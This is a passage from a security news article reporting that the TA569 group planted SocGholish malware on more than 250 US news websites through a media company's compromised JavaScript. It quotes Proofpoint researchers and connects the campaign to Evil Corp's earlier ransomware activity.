“The media company in question is a company that provides both video content and advertising to major news outlets. [It] serves many different companies in different markets across the United States,” Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, told BleepingComputer.
“By changing the codebase of this otherwise benign JS, it is now used to deploy SocGholish.”
In total, the malware was installed on websites of more than 250 US news outlets, some of which are major news organizations, according to security researchers from corporate security firm Proofpoint.
While the total number of affected news organizations is currently unknown, Proofpoint says it is aware of affected media organizations (including national news outlets) from New York, Boston, Chicago, Miami, Washington, DC, and others.
We track this actor as #TA569. TA569 has a history of taking turns removing and restoring these malicious JS injections. Therefore, the presence of the payload and malicious content can vary from hour to hour and should not be considered a false positive.
— Threat Insight (@threatinsight) November 2, 2022
“TA569 has previously used media resources to spread SocGholish, and this malware can lead to secondary infections, including potential ransomware,” DeGrippo also told BleepingComputer.
“The situation needs to be closely monitored as Proofpoint has observed TA569 re-infecting the same assets just days after remediation.”
Link to ransomware attacks
Proofpoint has previously observed SocGholish campaigns that used fake updates and website redirects to infect users, including in some cases ransomware payloads.
Cybercrime gang Evil Corp also used SocGholish in a very similar campaign to infect the employees of more than 30 large US private companies via fake software update alerts sent through dozens of compromised US newspaper websites.
The infected computers were later used as a springboard into employers’ corporate networks in attacks attempting to deploy the gang’s WastedLocker ransomware.
Fortunately, Symantec revealed in a report that it blocked Evil Corp’s attempts to encrypt the breached networks in attacks targeting several private companies, including 30 US companies, eight of them Fortune 500 companies.
SocGholish was also recently used for backdoor networks infected with Raspberry Robin malware, in what Microsoft called Evil Corp’s pre-ransomware behavior.
Update Nov. 2 6:22 p.m. EDT: Added Proofpoint statement.